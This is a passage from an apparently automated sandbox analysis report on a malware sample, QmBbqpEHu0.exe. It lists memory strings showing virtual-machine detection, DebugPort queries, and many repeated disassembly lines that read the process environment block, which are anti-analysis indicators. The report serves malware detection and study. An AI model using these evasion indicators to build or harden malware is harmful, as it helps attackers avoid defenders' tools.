                Source: QmBbqpEHu0.exe, 00000000.00000002.3587047984.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587022380.000000000124F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 0000000D.00000002.2634312274.000002916E5FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\finger.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Code function: 4_2_00417DC3 LdrLoadDll, 4_2_00417DC3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe Code function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h] 4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01048243 mov ecx, dword ptr fs:[00000030h]4_2_01048243
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109625D mov eax, dword ptr fs:[00000030h]4_2_0109625D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A250 mov eax, dword ptr fs:[00000030h]4_2_0107A250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A250 mov eax, dword ptr fs:[00000030h]4_2_0107A250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8397 mov eax, dword ptr fs:[00000030h]4_2_00FB8397
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8397 mov eax, dword ptr fs:[00000030h]4_2_00FB8397
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8397 mov eax, dword ptr fs:[00000030h]4_2_00FB8397
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE438F mov eax, dword ptr fs:[00000030h]4_2_00FE438F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE438F mov eax, dword ptr fs:[00000030h]4_2_00FE438F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070274 mov eax, dword ptr fs:[00000030h]4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE388 mov eax, dword ptr fs:[00000030h]4_2_00FBE388
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE388 mov eax, dword ptr fs:[00000030h]4_2_00FBE388
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE388 mov eax, dword ptr fs:[00000030h]4_2_00FBE388
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040283 mov eax, dword ptr fs:[00000030h]4_2_01040283
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040283 mov eax, dword ptr fs:[00000030h]4_2_01040283
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040283 mov eax, dword ptr fs:[00000030h]4_2_01040283
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov ecx, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010562A0 mov eax, dword ptr fs:[00000030h]4_2_010562A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010962D6 mov eax, dword ptr fs:[00000030h]4_2_010962D6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC310 mov ecx, dword ptr fs:[00000030h]4_2_00FBC310
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE0310 mov ecx, dword ptr fs:[00000030h]4_2_00FE0310
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA30B mov eax, dword ptr fs:[00000030h]4_2_00FFA30B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA30B mov eax, dword ptr fs:[00000030h]4_2_00FFA30B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA30B mov eax, dword ptr fs:[00000030h]4_2_00FFA30B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056500 mov eax, dword ptr fs:[00000030h]4_2_01056500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094500 mov eax, dword ptr fs:[00000030h]4_2_01094500
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC04E5 mov ecx, dword ptr fs:[00000030h]4_2_00FC04E5
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF44B0 mov ecx, dword ptr fs:[00000030h]4_2_00FF44B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC64AB mov eax, dword ptr fs:[00000030h]4_2_00FC64AB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEA470 mov eax, dword ptr fs:[00000030h]4_2_00FEA470
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEA470 mov eax, dword ptr fs:[00000030h]4_2_00FEA470
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEA470 mov eax, dword ptr fs:[00000030h]4_2_00FEA470
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010405A7 mov eax, dword ptr fs:[00000030h]4_2_010405A7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010405A7 mov eax, dword ptr fs:[00000030h]4_2_010405A7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010405A7 mov eax, dword ptr fs:[00000030h]4_2_010405A7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE245A mov eax, dword ptr fs:[00000030h]4_2_00FE245A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB645D mov eax, dword ptr fs:[00000030h]4_2_00FB645D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE443 mov eax, dword ptr fs:[00000030h]4_2_00FFE443
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE420 mov eax, dword ptr fs:[00000030h]4_2_00FBE420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE420 mov eax, dword ptr fs:[00000030h]4_2_00FBE420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBE420 mov eax, dword ptr fs:[00000030h]4_2_00FBE420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC427 mov eax, dword ptr fs:[00000030h]4_2_00FBC427
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8402 mov eax, dword ptr fs:[00000030h]4_2_00FF8402
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8402 mov eax, dword ptr fs:[00000030h]4_2_00FF8402
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8402 mov eax, dword ptr fs:[00000030h]4_2_00FF8402
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC5ED mov eax, dword ptr fs:[00000030h]4_2_00FFC5ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC5ED mov eax, dword ptr fs:[00000030h]4_2_00FFC5ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE5E7 mov eax, dword ptr fs:[00000030h]4_2_00FEE5E7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC25E0 mov eax, dword ptr fs:[00000030h]4_2_00FC25E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01046420 mov eax, dword ptr fs:[00000030h]4_2_01046420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC65D0 mov eax, dword ptr fs:[00000030h]4_2_00FC65D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA5D0 mov eax, dword ptr fs:[00000030h]4_2_00FFA5D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA5D0 mov eax, dword ptr fs:[00000030h]4_2_00FFA5D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE5CF mov eax, dword ptr fs:[00000030h]4_2_00FFE5CF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE5CF mov eax, dword ptr fs:[00000030h]4_2_00FFE5CF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE45B1 mov eax, dword ptr fs:[00000030h]4_2_00FE45B1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE45B1 mov eax, dword ptr fs:[00000030h]4_2_00FE45B1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A456 mov eax, dword ptr fs:[00000030h]4_2_0107A456
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE59C mov eax, dword ptr fs:[00000030h]4_2_00FFE59C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C460 mov ecx, dword ptr fs:[00000030h]4_2_0104C460
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF4588 mov eax, dword ptr fs:[00000030h]4_2_00FF4588
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2582 mov eax, dword ptr fs:[00000030h]4_2_00FC2582
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2582 mov ecx, dword ptr fs:[00000030h]4_2_00FC2582
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF656A mov eax, dword ptr fs:[00000030h]4_2_00FF656A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF656A mov eax, dword ptr fs:[00000030h]4_2_00FF656A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF656A mov eax, dword ptr fs:[00000030h]4_2_00FF656A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A49A mov eax, dword ptr fs:[00000030h]4_2_0107A49A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8550 mov eax, dword ptr fs:[00000030h]4_2_00FC8550
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8550 mov eax, dword ptr fs:[00000030h]4_2_00FC8550
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104A4B0 mov eax, dword ptr fs:[00000030h]4_2_0104A4B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103C730 mov eax, dword ptr fs:[00000030h]4_2_0103C730
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA6C7 mov ebx, dword ptr fs:[00000030h]4_2_00FFA6C7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA6C7 mov eax, dword ptr fs:[00000030h]4_2_00FFA6C7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF66B0 mov eax, dword ptr fs:[00000030h]4_2_00FF66B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002750 mov eax, dword ptr fs:[00000030h]4_2_01002750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002750 mov eax, dword ptr fs:[00000030h]4_2_01002750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01044755 mov eax, dword ptr fs:[00000030h]4_2_01044755
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC6A6 mov eax, dword ptr fs:[00000030h]4_2_00FFC6A6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E75D mov eax, dword ptr fs:[00000030h]4_2_0104E75D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4690 mov eax, dword ptr fs:[00000030h]4_2_00FC4690
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4690 mov eax, dword ptr fs:[00000030h]4_2_00FC4690
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106678E mov eax, dword ptr fs:[00000030h]4_2_0106678E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF2674 mov eax, dword ptr fs:[00000030h]4_2_00FF2674
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA660 mov eax, dword ptr fs:[00000030h]4_2_00FFA660
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA660 mov eax, dword ptr fs:[00000030h]4_2_00FFA660
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010747A0 mov eax, dword ptr fs:[00000030h]4_2_010747A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDC640 mov eax, dword ptr fs:[00000030h]4_2_00FDC640
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010407C3 mov eax, dword ptr fs:[00000030h]4_2_010407C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC262C mov eax, dword ptr fs:[00000030h]4_2_00FC262C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE627 mov eax, dword ptr fs:[00000030h]4_2_00FDE627
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF6620 mov eax, dword ptr fs:[00000030h]4_2_00FF6620
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8620 mov eax, dword ptr fs:[00000030h]4_2_00FF8620
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E7E1 mov eax, dword ptr fs:[00000030h]4_2_0104E7E1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC47FB mov eax, dword ptr fs:[00000030h]4_2_00FC47FB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC47FB mov eax, dword ptr fs:[00000030h]4_2_00FC47FB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E609 mov eax, dword ptr fs:[00000030h]4_2_0103E609
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE27ED mov eax, dword ptr fs:[00000030h]4_2_00FE27ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE27ED mov eax, dword ptr fs:[00000030h]4_2_00FE27ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE27ED mov eax, dword ptr fs:[00000030h]4_2_00FE27ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002619 mov eax, dword ptr fs:[00000030h]4_2_01002619
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCC7C0 mov eax, dword ptr fs:[00000030h]4_2_00FCC7C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC07AF mov eax, dword ptr fs:[00000030h]4_2_00FC07AF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108866E mov eax, dword ptr fs:[00000030h]4_2_0108866E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108866E mov eax, dword ptr fs:[00000030h]4_2_0108866E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8770 mov eax, dword ptr fs:[00000030h]4_2_00FC8770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0750 mov eax, dword ptr fs:[00000030h]4_2_00FC0750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF674D mov esi, dword ptr fs:[00000030h]4_2_00FF674D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF674D mov eax, dword ptr fs:[00000030h]4_2_00FF674D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF674D mov eax, dword ptr fs:[00000030h]4_2_00FF674D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF273C mov eax, dword ptr fs:[00000030h]4_2_00FF273C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF273C mov ecx, dword ptr fs:[00000030h]4_2_00FF273C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF273C mov eax, dword ptr fs:[00000030h]4_2_00FF273C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC720 mov eax, dword ptr fs:[00000030h]4_2_00FFC720
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC720 mov eax, dword ptr fs:[00000030h]4_2_00FFC720
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0710 mov eax, dword ptr fs:[00000030h]4_2_00FC0710
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF0710 mov eax, dword ptr fs:[00000030h]4_2_00FF0710
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010406F1 mov eax, dword ptr fs:[00000030h]4_2_010406F1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010406F1 mov eax, dword ptr fs:[00000030h]4_2_010406F1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC700 mov eax, dword ptr fs:[00000030h]4_2_00FFC700
